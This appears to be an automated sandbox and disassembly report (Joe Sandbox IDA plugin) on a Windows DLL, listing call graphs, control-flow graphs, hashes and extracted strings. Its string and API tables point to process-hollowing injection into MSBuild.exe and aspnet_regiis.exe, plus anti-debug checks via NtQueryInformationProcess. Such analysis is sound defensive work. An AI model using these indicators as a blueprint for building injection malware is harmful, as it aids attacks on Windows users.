10532 6cde37dd 10531->10532 10536 6cde6796 10532->10536 10537 6cde67a9 10536->10537 10538 6cde37f3 10536->10538 10537->10538 10544 6cde6ba4 10537->10544 10540 6cde67c3 10538->10540 10541 6cde67eb 10540->10541 10542 6cde67d6 10540->10542 10542->10541 10566 6cde51e2 10542->10566 10545 6cde6bb0 ___scrt_is_nonwritable_in_current_image 10544->10545 10546 6cde3c77 __fassign 37 API calls 10545->10546 10547 6cde6bb9 10546->10547 10554 6cde6bff 10547->10554 10557 6cde3f0a EnterCriticalSection 10547->10557 10549 6cde6bd7 10558 6cde6c25 10549->10558 10554->10538 10555 6cde3759 __fassign 37 API calls 10556 6cde6c24 10555->10556 10557->10549 10559 6cde6be8 10558->10559 10560 6cde6c33 __fassign 10558->10560 10562 6cde6c04 10559->10562 10560->10559 10561 6cde6958 __fassign 14 API calls 10560->10561 10561->10559 10565 6cde3f52 LeaveCriticalSection 10562->10565 10564 6cde6bfb 10564->10554 10564->10555 10565->10564 10567 6cde3c77 __fassign 37 API calls 10566->10567 10568 6cde51ec 10567->10568 10569 6cde50fa __fassign 37 API calls 10568->10569 10570 6cde51f2 10569->10570 10570->10541 10682 6cde370c 10681->10682 10683 6cde371a 10681->10683 10682->10683 10688 6cde3731 10682->10688 10684 6cde4203 __dosmaperr 14 API calls 10683->10684 10685 6cde3722 10684->10685 10686 6cde4146 __fassign 25 API calls 10685->10686 10687 6cde372c 10686->10687 10687->10337 10688->10687 10689 6cde4203 __dosmaperr 14 API calls 10688->10689 10689->10685 10691 6cde32dc 10690->10691 10695 6cde32a8 10690->10695 10692 6cde32f3 10691->10692 10693 6cde4273 _free 14 API calls 10691->10693 10694 6cde4273 _free 14 API calls 10692->10694 10693->10691 10694->10695 10695->10335 10697 6cde4162 10696->10697 10698 6cde3f9a __fassign 8 API calls 10697->10698 10699 6cde4177 GetCurrentProcess TerminateProcess 10698->10699 10699->10340 10906 6cde2ea8 10907 6cde2ebf 10906->10907 10908 6cde2eb8 10906->10908 10909 6cde2ee0 10907->10909 10911 6cde2eca 10907->10911 10910 6cde519a 47 API calls 10909->10910 10912 6cde2ee6 10910->10912 10913 6cde4203 __dosmaperr 14 API calls 10911->10913 10930 6cde4be1 GetModuleFileNameW 10912->10930 10915 6cde2ecf 10913->10915 10917 6cde4146 __fassign 25 API calls 10915->10917 10917->10908 10922 6cde2f44 10925 6cde4203 __dosmaperr 14 API calls 10922->10925 10923 6cde2f50 10924 6cde2fde 37 API calls 10923->10924 10927 6cde2f68 10924->10927 10929 6cde2f49 10925->10929 10926 6cde4273 _free 14 API calls 10926->10908 10928 6cde4273 _free 14 API calls 10927->10928 10927->10929 10928->10929 10929->10926 10931 6cde4c10 GetLastError 10930->10931 10932 6cde4c21 10930->10932 10952 6cde41cd 10931->10952 10957 6cde495a 10932->10957 10936 6cde4c1c 10938 6cde0dc0 _ValidateLocalCookies 5 API calls 10936->10938 10939 6cde2ef9 10938->10939 10940 6cde2fde 10939->10940 10942 6cde3003 10940->10942 10944 6cde3063 10942->10944 10996 6cde54c0 10942->10996 10943 6cde2f2e 10946 6cde3152 10943->10946 10944->10943 10945 6cde54c0 37 API calls 10944->10945 10945->10944 10947 6cde3163 10946->10947 10951 6cde2f3b 10946->10951 10948 6cde4216 __dosmaperr 14 API calls 10947->10948 10947->10951 10949 6cde318c 10948->10949 10950 6cde4273 _free 14 API calls 10949->10950 10950->10951 10951->10922 10951->10923 10983 6cde41f0 10952->10983 10954 6cde41d8 __dosmaperr 10955 6cde4203 __dosmaperr 14 API calls 10954->10955 10956 6cde41eb 10955->10956 10956->10936 10958 6cde379d __fassign 37 API calls 10957->10958 10959 6cde496c 10958->10959 10960 6cde497e 10959->10960 10986 6cde5924 10959->10986 10962 6cde4adf 10960->10962 10963 6cde4aec 10962->10963 10964 6cde4afb 10962->10964 10963->10936 10965 6cde4b28 10964->10965 10966 6cde4b03 10964->10966 10967 6cde556d ___scrt_uninitialize_crt WideCharToMultiByte 10965->10967 10966->10963 10992 6cde4ba6 10966->10992 10969 6cde4b38 10967->10969 10970 6cde4b3f GetLastError 10969->10970 10971 6cde4b55 10969->10971 10972 6cde41cd __dosmaperr 14 API calls 10970->10972 10973 6cde4ba6 14 API calls 10971->10973 10977 6cde4b66 10971->10977 10975 6cde4b4b 10972->10975 10973->10977 10974 6cde556d ___scrt_uninitialize_crt WideCharToMultiByte 10978 6cde4b7e 10974->10978 10976 6cde4203 __dosmaperr 14 API calls 10975->10976 10976->10963 10977->10963 10977->10974 10978->10963 10979 6cde4b85 GetLastError 10978->10979 10980 6cde41cd __dosmaperr 14 API calls 10979->10980 10981 6cde4b91 10980->10981 10982 6cde4203 __dosmaperr 14 API calls 10981->10982 10982->10963 10984 6cde3dce __dosmaperr 14 API calls 10983->10984 10985 6cde41f5 10984->10985 10985->10954 10989 6cde574c 10986->10989 10990 6cde5861 __dosmaperr 5 API calls 10989->10990 10991 6cde5762 10990->10991 10991->10960 10993 6cde4bb1 10992->10993 10994 6cde4203 __dosmaperr 14 API calls 10993->10994 10995 6cde4bba 10994->10995 10995->10963 10999 6cde5469 10996->10999 11000 6cde379d __fassign 37 API calls 10999->11000 11001 6cde547d 11000->11001 11001->10942 11486 6cde3327 11487 6cde3339 11486->11487 11488 6cde333f 11486->11488 11489 6cde32cf 14 API calls 11487->11489 11489->11488 11189 6cde35a4 11190 6cde4273 _free 14 API calls 11189->11190 11191 6cde35b2 11190->11191 11192 6cde4273 _free 14 API calls 11191->11192 11193 6cde35c5 11192->11193 11194 6cde4273 _free 14 API calls 11193->11194 11195 6cde35d6 11194->11195 11196 6cde4273 _free 14 API calls 11195->11196 11197 6cde35e7 11196->11197 11002 6cde10a3 ___scrt_dllmain_exception_filter 11129 6cde7221 11131 6cde716e 11129->11131 11130 6cde7186 11132 6cde719a 11130->11132 11133 6cde4203 __dosmaperr 14 API calls 11130->11133 11131->11130 11131->11132 11135 6cde71be 11131->11135 11137 6cde7190 11133->11137 11134 6cde4146 __fassign 25 API calls 11134->11132 11135->11132 11136 6cde4203 __dosmaperr 14 API calls 11135->11136 11136->11137 11137->11134
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Memory$Write$CloseHandleWindow$CreateThread$AllocAllocateConsoleContextProcessShow$Read
                                                                    • String ID: g]J$g]J$%N[$%N[$(z(a$+,^c$;E-F$;E-F$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$D_`$MZx$Yal$[3?H$kernel32.dll$ntdll.dll$6IX$6IX$AEf$AEf$En$En$Y$Y$f?}
                                                                    • API String ID: 1378836336-1102560837
                                                                    • Opcode ID: 3487d27fc20240ab1bffbc7b7c0a5bf8edb0713c8af05e82cc41416777a5f95b
                                                                    • Instruction ID: 079e4cd9123fd1d0a6227029cb1ca7c3ea25a621730df821d58e140d220ecb03
                                                                    • Opcode Fuzzy Hash: 3487d27fc20240ab1bffbc7b7c0a5bf8edb0713c8af05e82cc41416777a5f95b
                                                                    • Instruction Fuzzy Hash: 55D30376E482108FCF14CF3CC9D43DA77F2AB8A355F118199D859DB7A4C236AA898F41
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$File$CloseModule$CreateCurrentProcess$MappingProtectVirtual$InformationNameView
                                                                    • String ID: (j$:MB$$@$mA=Q$mA=Q$}auZ$'<K$'<K
                                                                    • API String ID: 1267590279-1113462242
                                                                    • Opcode ID: 0f8d3d7ee240cb1e8162f399c4156862a62b92bb3ce42671e31fe026ce256bbe
                                                                    • Instruction ID: 988fd03497820a1d9df1812617f1f5b543ce9cd460790fdce459be48128364a7
                                                                    • Opcode Fuzzy Hash: 0f8d3d7ee240cb1e8162f399c4156862a62b92bb3ce42671e31fe026ce256bbe
                                                                    • Instruction Fuzzy Hash: F553F036F502108FCF048F3CC9953DEBBF2AB47365F128159D499DBBA5C639A9898B01

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1456 6cdd6e40-6cdd6e8a 1457 6cdd6e91-6cdd6e9c 1456->1457 1458 6cdd750f-6cdd7550 1457->1458 1459 6cdd6ea2-6cdd6eaf 1457->1459 1460 6cdd7fda 1458->1460 1462 6cdd7fa9-6cdd7fb0 1459->1462 1463 6cdd6eb5-6cdd6ec2 1459->1463 1460->1457 1462->1460 1465 6cdd6ec8-6cdd6ed5 1463->1465 1466 6cdd73c5-6cdd7406 1463->1466 1468 6cdd7dfd-6cdd7e3e 1465->1468 1469 6cdd6edb-6cdd6ee8 1465->1469 1466->1460 1468->1460 1471 6cdd6eee-6cdd6efb 1469->1471 1472 6cdd72c1-6cdd72e2 1469->1472 1474 6cdd7eec-6cdd7ef3 1471->1474 1475 6cdd6f01-6cdd6f0e 1471->1475 1472->1460 1474->1460 1477 6cdd7adf-6cdd7b20 1475->1477 1478 6cdd6f14-6cdd6f21 1475->1478 1477->1460 1480 6cdd7ec5-6cdd7ecc 1478->1480 1481 6cdd6f27-6cdd6f34 1478->1481 1480->1460 1483 6cdd6f3a-6cdd6f47 1481->1483 1484 6cdd72e7-6cdd7355 1481->1484 1486 6cdd6f4d-6cdd6f5a 1483->1486 1487 6cdd7b98-6cdd7b9f 1483->1487 1484->1460 1489 6cdd7ee0-6cdd7ee7 1486->1489 1490 6cdd6f60-6cdd6f6d 1486->1490 1487->1460 1489->1460 1492 6cdd740b-6cdd748b 1490->1492 1493 6cdd6f73-6cdd6f80 1490->1493 1492->1460 1495 6cdd6f86-6cdd6f93 1493->1495 1496 6cdd7503-6cdd750a 1493->1496 1498 6cdd6f99-6cdd6fa6 1495->1498 1499 6cdd7555-6cdd75a7 1495->1499 1496->1460 1501 6cdd6fac-6cdd6fb9 1498->1501 1502 6cdd75b8-6cdd7626 1498->1502 1499->1460 1504 6cdd6fbf-6cdd6fcc 1501->1504 1505 6cdd762b-6cdd76fd GetModuleHandleW call 6cdd4810 call 6cde19f0 1501->1505 1502->1460 1509 6cdd78ca-6cdd790d NtQueryInformationProcess 1504->1509 1510 6cdd6fd2-6cdd6fdf 1504->1510 1505->1460 1509->1460 1514 6cdd6fe5-6cdd6ff2 1510->1514 1515 6cdd7f04-6cdd7f69 GetModuleHandleW call 6cdd4810 call 6cde19f0 1510->1515 1519 6cdd6ff8-6cdd7005 1514->1519 1520 6cdd7fb5-6cdd7fbf 1514->1520 1515->1460 1523 6cdd700b-6cdd7018 1519->1523 1524 6cdd7ab2-6cdd7ab9 1519->1524 1520->1460 1527 6cdd701e-6cdd702b 1523->1527 1528 6cdd7d01-6cdd7d77 1523->1528 1524->1460 1530 6cdd7779-6cdd77df 1527->1530 1531 6cdd7031-6cdd703e 1527->1531 1528->1460 1530->1460 1533 6cdd7044-6cdd7051 1531->1533 1534 6cdd79f0-6cdd79f7 1531->1534 1536 6cdd7a5c-6cdd7aad 1533->1536 1537 6cdd7057-6cdd7064 1533->1537 1534->1460 1536->1460 1539 6cdd7ef8-6cdd7eff 1537->1539 1540 6cdd706a-6cdd7077 1537->1540 1539->1460 1542 6cdd707d-6cdd708a 1540->1542 1543 6cdd7702-6cdd7709 1540->1543 1545 6cdd7090-6cdd709d 1542->1545 1546 6cdd7bf2-6cdd7c3b 1542->1546 1543->1460 1548 6cdd77e4-6cdd7852 1545->1548 1549 6cdd70a3-6cdd70b0 1545->1549 1546->1460 1548->1460 1551 6cdd7857-6cdd78b9 1549->1551 1552 6cdd70b6-6cdd70c3 1549->1552 1551->1460 1554 6cdd70c9-6cdd70d6 1552->1554 1555 6cdd7dca-6cdd7dd1 1552->1555 1557 6cdd70dc-6cdd70e9 1554->1557 1558 6cdd7e43-6cdd7ec0 1554->1558 1555->1460 1560 6cdd70ef-6cdd70fc 1557->1560 1561 6cdd7f89-6cdd7f98 1557->1561 1558->1460 1563 6cdd7df1-6cdd7df8 1560->1563 1564 6cdd7102-6cdd710f 1560->1564 1561->1460 1563->1460 1566 6cdd7f9d-6cdd7fa4 1564->1566 1567 6cdd7115-6cdd7122 1564->1567 1566->1460 1569 6cdd79fc-6cdd7a09 1567->1569 1570 6cdd7128-6cdd7135 1567->1570 1569->1460 1572 6cdd7a0e-6cdd7a57 1570->1572 1573 6cdd713b-6cdd7148 1570->1573 1572->1460 1575 6cdd714e-6cdd715b 1573->1575 1576 6cdd7dd6-6cdd7df0 call 6cde0dc0 1573->1576 1579 6cdd7b25-6cdd7b93 1575->1579 1580 6cdd7161-6cdd716e 1575->1580 1579->1460 1583 6cdd7fc4-6cdd7fd3 1580->1583 1584 6cdd7174-6cdd7181 1580->1584 1583->1460 1586 6cdd735a-6cdd73c0 1584->1586 1587 6cdd7187-6cdd7194 1584->1587 1586->1460 1589 6cdd7d7c-6cdd7dc5 1587->1589 1590 6cdd719a-6cdd71a7 1587->1590 1589->1460 1592 6cdd71ad-6cdd71ba 1590->1592 1593 6cdd7ed1-6cdd7edb 1590->1593 1595 6cdd7927-6cdd7970 1592->1595 1596 6cdd71c0-6cdd71cd 1592->1596 1593->1460 1595->1460 1598 6cdd7f6e-6cdd7f75 1596->1598 1599 6cdd71d3-6cdd71e0 1596->1599 1598->1460 1601 6cdd7f7a-6cdd7f84 1599->1601 1602 6cdd71e6-6cdd71f3 1599->1602 1601->1460 1604 6cdd78be-6cdd78c5 1602->1604 1605 6cdd71f9-6cdd7206 1602->1605 1604->1460 1607 6cdd720c-6cdd7219 1605->1607 1608 6cdd7975-6cdd79eb 1605->1608 1610 6cdd721f-6cdd722c 1607->1610 1611 6cdd770e-6cdd7774 1607->1611 1608->1460 1613 6cdd7abe-6cdd7ac5 1610->1613 1614 6cdd7232-6cdd723f 1610->1614 1611->1460 1613->1460 1616 6cdd7245-6cdd7252 1614->1616 1617 6cdd7490-6cdd74fe 1614->1617 1619 6cdd7258-6cdd7265 1616->1619 1620 6cdd7912-6cdd7922 1616->1620 1617->1460 1622 6cdd726b-6cdd7278 1619->1622 1623 6cdd7c40-6cdd7c89 1619->1623 1620->1460 1625 6cdd7c8e-6cdd7cfc 1622->1625 1626 6cdd727e-6cdd728b 1622->1626 1623->1460 1625->1460 1628 6cdd7aca-6cdd7ada 1626->1628 1629 6cdd7291-6cdd729e 1626->1629 1628->1460 1631 6cdd75ac-6cdd75b3 1629->1631 1632 6cdd72a4-6cdd72b1 1629->1632 1631->1460 1634 6cdd7ba4-6cdd7bed 1632->1634 1635 6cdd72b7-6cdd72bc 1632->1635 1634->1460 1635->1460
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "m&$"m&$@B_A$@B_A$D6w_$NtQueryInformationProcess$Y($Y($ntdll.dll
                                                                    • API String ID: 0-3531410141
                                                                    • Opcode ID: 771a1eb2d2c6e980a3c6793ef265c4675c97d37f821d725b039b229881a23581
                                                                    • Instruction ID: f312c0e2608ec424985a235a006c8792c51e820b70fc1b37b74be5b01a13b3db
                                                                    • Opcode Fuzzy Hash: 771a1eb2d2c6e980a3c6793ef265c4675c97d37f821d725b039b229881a23581
                                                                    • Instruction Fuzzy Hash: DD923536E512059FCF04CFBCC5A43DE7BF2EB42319F229515D425DB7A8D62AA90ACB01

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1637 6cde0f28-6cde0f3b call 6cde1790 1640 6cde0f3d-6cde0f3f 1637->1640 1641 6cde0f41-6cde0f63 call 6cde1370 1637->1641 1642 6cde0faa-6cde0fb9 1640->1642 1645 6cde0f65-6cde0fa8 call 6cde143b call 6cde12f7 call 6cde1759 call 6cde0fbd call 6cde15dc call 6cde0fca 1641->1645 1646 6cde0fd0-6cde0fe9 call 6cde160a call 6cde1790 1641->1646 1645->1642 1658 6cde0ffa-6cde1001 1646->1658 1659 6cde0feb-6cde0ff1 1646->1659 1662 6cde100d-6cde1021 dllmain_raw 1658->1662 1663 6cde1003-6cde1006 1658->1663 1659->1658 1661 6cde0ff3-6cde0ff5 1659->1661 1667 6cde10d3-6cde10e2 1661->1667 1664 6cde10ca-6cde10d1 1662->1664 1665 6cde1027-6cde1038 dllmain_crt_dispatch 1662->1665 1663->1662 1668 6cde1008-6cde100b 1663->1668 1664->1667 1665->1664 1669 6cde103e-6cde1050 call 6cddfcb0 1665->1669 1668->1669 1675 6cde1079-6cde107b 1669->1675 1676 6cde1052-6cde1054 1669->1676 1679 6cde107d-6cde1080 1675->1679 1680 6cde1082-6cde1093 dllmain_crt_dispatch 1675->1680 1676->1675 1678 6cde1056-6cde1074 call 6cddfcb0 call 6cde0f28 dllmain_raw 1676->1678 1678->1675 1679->1664 1679->1680 1680->1664 1682 6cde1095-6cde10c7 dllmain_raw 1680->1682 1682->1664
                                                                    APIs
                                                                    • __RTC_Initialize.LIBCMT ref: 6CDE0F6F
                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6CDE0F89
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                    • String ID:
                                                                    • API String ID: 2442719207-0
                                                                    • Opcode ID: 0a95d5ba18ed48e0267785611021d4f6024b70cea41427ffe1a4aa4da2f12252
                                                                    • Instruction ID: a3387dca2b8ef902047f402b6ea8cdb82f80e7515ad8149501b8d84c4fe10f20
                                                                    • Opcode Fuzzy Hash: 0a95d5ba18ed48e0267785611021d4f6024b70cea41427ffe1a4aa4da2f12252
                                                                    • Instruction Fuzzy Hash: 8F41E372F05295EFDB219F95C800BAE3AB4EB8D7A8F014519E81567B71CB309D05EBB0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1687 6cde0fd8-6cde0fe9 call 6cde1790 1690 6cde0ffa-6cde1001 1687->1690 1691 6cde0feb-6cde0ff1 1687->1691 1693 6cde100d-6cde1021 dllmain_raw 1690->1693 1694 6cde1003-6cde1006 1690->1694 1691->1690 1692 6cde0ff3-6cde0ff5 1691->1692 1697 6cde10d3-6cde10e2 1692->1697 1695 6cde10ca-6cde10d1 1693->1695 1696 6cde1027-6cde1038 dllmain_crt_dispatch 1693->1696 1694->1693 1698 6cde1008-6cde100b 1694->1698 1695->1697 1696->1695 1699 6cde103e-6cde1050 call 6cddfcb0 1696->1699 1698->1699 1702 6cde1079-6cde107b 1699->1702 1703 6cde1052-6cde1054 1699->1703 1705 6cde107d-6cde1080 1702->1705 1706 6cde1082-6cde1093 dllmain_crt_dispatch 1702->1706 1703->1702 1704 6cde1056-6cde1074 call 6cddfcb0 call 6cde0f28 dllmain_raw 1703->1704 1704->1702 1705->1695 1705->1706 1706->1695 1708 6cde1095-6cde10c7 dllmain_raw 1706->1708 1708->1695
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                    • String ID:
                                                                    • API String ID: 3136044242-0
                                                                    • Opcode ID: 3554b2d89e5335f89a46e8e092afbb126e6340da86d4f0cd3c12ad0c06a06f2a
                                                                    • Instruction ID: 9156ffc67282e7a16e26d089beeaa4c9a25655aee24b9a9dc19031867e5b49c5
                                                                    • Opcode Fuzzy Hash: 3554b2d89e5335f89a46e8e092afbb126e6340da86d4f0cd3c12ad0c06a06f2a
                                                                    • Instruction Fuzzy Hash: 1F21BF72F01299EFDB214F55C840AAF3AB8EB88BD8F014115F8155BA71C730DD11EBA0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1713 6cde0e21-6cde0e2f call 6cde1790 call 6cde146b 1717 6cde0e34-6cde0e37 1713->1717 1718 6cde0f0e 1717->1718 1719 6cde0e3d-6cde0e55 call 6cde1370 1717->1719 1721 6cde0f10-6cde0f1f 1718->1721 1723 6cde0e5b-6cde0e6c call 6cde13cd 1719->1723 1724 6cde0f20-6cde0f27 call 6cde160a 1719->1724 1729 6cde0e6e-6cde0e90 call 6cde172d call 6cde12eb call 6cde130f call 6cde2a51 1723->1729 1730 6cde0ebb-6cde0ec9 call 6cde0f04 1723->1730 1729->1730 1749 6cde0e92-6cde0e99 call 6cde13a2 1729->1749 1730->1718 1736 6cde0ecb-6cde0ed5 call 6cde1604 1730->1736 1741 6cde0ef6-6cde0eff 1736->1741 1742 6cde0ed7-6cde0ee0 call 6cde152b 1736->1742 1741->1721 1742->1741 1748 6cde0ee2-6cde0ef4 1742->1748 1748->1741 1749->1730 1753 6cde0e9b-6cde0eb8 call 6cde2a0c 1749->1753 1753->1730
                                                                    APIs
                                                                    • __RTC_Initialize.LIBCMT ref: 6CDE0E6E
                                                                      • Part of subcall function 6CDE12EB: InitializeSListHead.KERNEL32(6CE40988,6CDE0E78,6CDF00D8,00000010,6CDE0E09,?,?,?,6CDE1031,?,00000001,?,?,00000001,?,6CDF0120), ref: 6CDE12F0
                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CDE0ED8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                    • String ID:
                                                                    • API String ID: 3231365870-0
                                                                    • Opcode ID: 7350e8affdccc49d090ead7a38bbf8621dfc2ca9e7f3a5f43c3ec0db61ec0b0a
                                                                    • Instruction ID: 9b955d0e87779593d519cbbe7fcb91615c6a643de0dc1163f4f0df06a5da39a0
                                                                    • Opcode Fuzzy Hash: 7350e8affdccc49d090ead7a38bbf8621dfc2ca9e7f3a5f43c3ec0db61ec0b0a
                                                                    • Instruction Fuzzy Hash: E621CF32745386EAEB10ABB484047DE33B0AB4E7ADF10442AD54127FF2CF61A04DD675

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1756 6cde5c4d-6cde5c52 1757 6cde5c54-6cde5c6c 1756->1757 1758 6cde5c6e-6cde5c72 1757->1758 1759 6cde5c7a-6cde5c83 1757->1759 1758->1759 1760 6cde5c74-6cde5c78 1758->1760 1761 6cde5c95 1759->1761 1762 6cde5c85-6cde5c88 1759->1762 1764 6cde5cf3-6cde5cf7 1760->1764 1763 6cde5c97-6cde5ca4 GetStdHandle 1761->1763 1765 6cde5c8a-6cde5c8f 1762->1765 1766 6cde5c91-6cde5c93 1762->1766 1767 6cde5ca6-6cde5ca8 1763->1767 1768 6cde5cb3 1763->1768 1764->1757 1769 6cde5cfd-6cde5d00 1764->1769 1765->1763 1766->1763 1767->1768 1770 6cde5caa-6cde5cb1 GetFileType 1767->1770 1771 6cde5cb5-6cde5cb7 1768->1771 1770->1771 1772 6cde5cb9-6cde5cc2 1771->1772 1773 6cde5cd5-6cde5ce7 1771->1773 1774 6cde5cca-6cde5ccd 1772->1774 1775 6cde5cc4-6cde5cc8 1772->1775 1773->1764 1776 6cde5ce9-6cde5cec 1773->1776 1774->1764 1777 6cde5ccf-6cde5cd3 1774->1777 1775->1764 1776->1764 1777->1764
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 6CDE5C99
                                                                    • GetFileType.KERNELBASE(00000000), ref: 6CDE5CAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleType
                                                                    • String ID:
                                                                    • API String ID: 3000768030-0
                                                                    • Opcode ID: 64ac300b0a698b80ebe40ab4af870b52dac1543f8039900dd5e1f7613713b8ac
                                                                    • Instruction ID: f6519870476137426b81b2a93e4d5d170d24ffde39afb645ee49c221545b276c
                                                                    • Opcode Fuzzy Hash: 64ac300b0a698b80ebe40ab4af870b52dac1543f8039900dd5e1f7613713b8ac
                                                                    • Instruction Fuzzy Hash: 2611B731605B52D6DB304B3E8CA4612BBE4A74F3B8F34071BD5FAC69F1E230D5868650

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1778 6cde31ad-6cde31bf call 6cde519a call 6cde565b 1782 6cde31c4-6cde31c8 1778->1782 1783 6cde31cf-6cde31d8 call 6cde31ff 1782->1783 1784 6cde31ca-6cde31cd 1782->1784 1790 6cde31df-6cde31e6 1783->1790 1791 6cde31da-6cde31dd 1783->1791 1785 6cde31f3-6cde31fe call 6cde4273 1784->1785 1792 6cde31eb-6cde31f2 call 6cde4273 1790->1792 1791->1792 1792->1785
                                                                    APIs
                                                                      • Part of subcall function 6CDE565B: GetEnvironmentStringsW.KERNEL32 ref: 6CDE5664
                                                                      • Part of subcall function 6CDE565B: _free.LIBCMT ref: 6CDE56C3
                                                                      • Part of subcall function 6CDE565B: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDE56D2
                                                                    • _free.LIBCMT ref: 6CDE31ED
